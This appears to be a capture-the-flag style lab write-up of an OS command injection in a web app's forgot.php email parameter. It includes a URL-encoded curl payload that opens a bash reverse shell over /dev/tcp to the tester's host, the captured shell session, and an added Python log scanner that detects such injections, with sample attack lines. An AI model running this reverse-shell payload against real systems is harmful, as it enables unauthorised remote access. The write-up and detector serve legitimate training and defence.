OS Command Injection


The target is hosting a custom web application at the /under_construction endpoint that suffers from an OS command injection vulnerability in the email parameter of forgot.php. The issue was identified and confirmed by sending a GET request. The command terminator used is & (URL-encoded as %26).

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/uc404]
└─$ curl -s "http://$IP/under_construction/forgot.php?email=%26bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.163%2F9999%200%3E%261%22"

Sending a URL-encoded reverse shell payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/uc404]
└─$ nnc 9999   
listening on [any] 9999 ...
connect to [192.168.45.163] from (UNKNOWN) [192.168.125.109] 57020
bash: cannot set terminal process group (571): Inappropriate ioctl for device
bash: no job control in this shell
www-data@UC404:/var/www/html/under_construction$ whoami
whoami
www-data
www-data@UC404:/var/www/html/under_construction$ hostname
hostname
UC404
www-data@UC404:/var/www/html/under_construction$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:dd:02 brd ff:ff:ff:ff:ff:ff
    inet 192.168.125.109/24 brd 192.168.125.255 scope global ens192
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the www-data account via OS command injection.
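Detection logic for the injection pattern described above, as an added example that is not part of the original report: it parses Apache combined-format access log lines and flags forgot.php requests whose URL-decoded email parameter contains shell metacharacters or is not a well-formed address. The log lines and IP addresses are constructed sample data; only the /under_construction/forgot.php path and the email parameter come from the report.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format log lines (sample data, not from the original report).
# Line 1 mirrors the forgot.php request shape described above; lines 2 and 4 are benign;
# line 3 appends a command after a valid address; line 5 is double URL-encoded.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /under_construction/forgot.php?email=%26id HTTP/1.1" 200 512 "-" "curl/8.0"
192.0.2.11 - - [01/Jan/2024:10:00:02 +0000] "GET /under_construction/forgot.php?email=alice%40example.com HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.12 - - [01/Jan/2024:10:00:03 +0000] "GET /under_construction/forgot.php?email=bob%40example.com%3Bid HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.13 - - [01/Jan/2024:10:00:04 +0000] "GET /under_construction/index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.14 - - [01/Jan/2024:10:00:05 +0000] "GET /under_construction/forgot.php?email=carol%40example.com%2526id HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method and request target from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
# Characters a shell treats as command separators, pipes, substitutions or redirections.
SHELL_META = re.compile(r'[&;|`$\n\r<>]')
# Deliberately strict: what a password-reset email field should look like.
EMAIL_RE = re.compile(r'^[^@\s]+@[^@\s]+\.[^@\s]+$')

def inspect_email_param(value):
    """Return the list of findings for one decoded email= value (empty if it looks clean)."""
    findings = []
    if SHELL_META.search(value):
        findings.append("shell metacharacter in email parameter")
    if not EMAIL_RE.match(value):
        findings.append("value is not a well-formed email address")
    return findings

def scan_log(text):
    """Return (ip, decoded_email, findings) for each forgot.php request with a suspicious email=."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/forgot.php"):
            continue
        # parse_qs splits on a literal '&' before decoding, so an encoded %26 stays inside the
        # value and decodes to '&'. The extra unquote() surfaces double-encoded payloads (a triage
        # heuristic: it only matters if the application itself decodes twice).
        for value in parse_qs(url.query, keep_blank_values=True).get("email", []):
            decoded = unquote(value)
            findings = inspect_email_param(decoded)
            if findings:
                alerts.append((m.group("ip"), decoded, findings))
    return alerts
```

Run against real logs, the same check belongs on the server side as input validation before any value reaches a shell; this scanner only finds attempts after the fact.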